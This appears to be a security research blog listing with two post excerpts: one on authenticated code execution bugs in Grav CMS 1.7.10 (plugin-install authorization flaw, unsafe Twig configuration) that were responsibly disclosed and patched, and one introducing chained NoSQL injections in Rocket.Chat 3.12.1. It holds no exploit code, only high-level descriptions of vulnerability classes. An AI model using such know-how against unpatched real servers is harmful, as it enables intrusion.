Code Execution vulnerabilities in Grav CMS 1.7.10 (CVE-2021-29439, CVE-2021-29440)
In the lineage of most recent flat-file PHP CMS, Grav CMS is a modern web platform to build fast, safe and extensible websites. It uses a modern technology stack with Twig, Symfony and Doctrine, and offers an administration dashboard that allows managing the whole website (structure, pages, static resources, etc.). It was voted as “Best Flat File CMS” in 2017 and 2019 and is rapidly gaining traction with over 12k Github stars.
As simplicity and security are often key arguments when choosing flat-file CMS, we recently pursued some security research on Grav 1.7.10 and discovered two interesting vulnerabilities in the core and the dashboard (respectively CVE-2021-29440 and CVE-2021-29439). These issues can be exploited by authenticated attackers with low privileges, and allow them to execute arbitrary code and commands on the underlying server.
We responsibly reported the following security-relevant bugs to the vendor, who quickly released version 1.7.11 to address them:
Improper authorization checks that can allow a low-privileged authenticated user to install arbitrary plugins;
A dangerous configuration of the Twig templating engine that can lead to the execution of PHP code, exploitable by users allowed to create or edit pages on the instance.
In this new publication, we will discuss the root cause of these two bugs, how they can be exploited by attackers to gain code execution, and how the vulnerable code was patched.
NoSQL Injections in Rocket.Chat 3.12.1 (CVE-2021-22911)
In this blog post we investigate these vulnerabilities by first taking a quick look at NoSQL databases, then explaining how injections look like in that context. We then analyze the found vulnerabilities and how they can be chained for an exploit. Finally we give advice on how to prevent such bugs in your applications.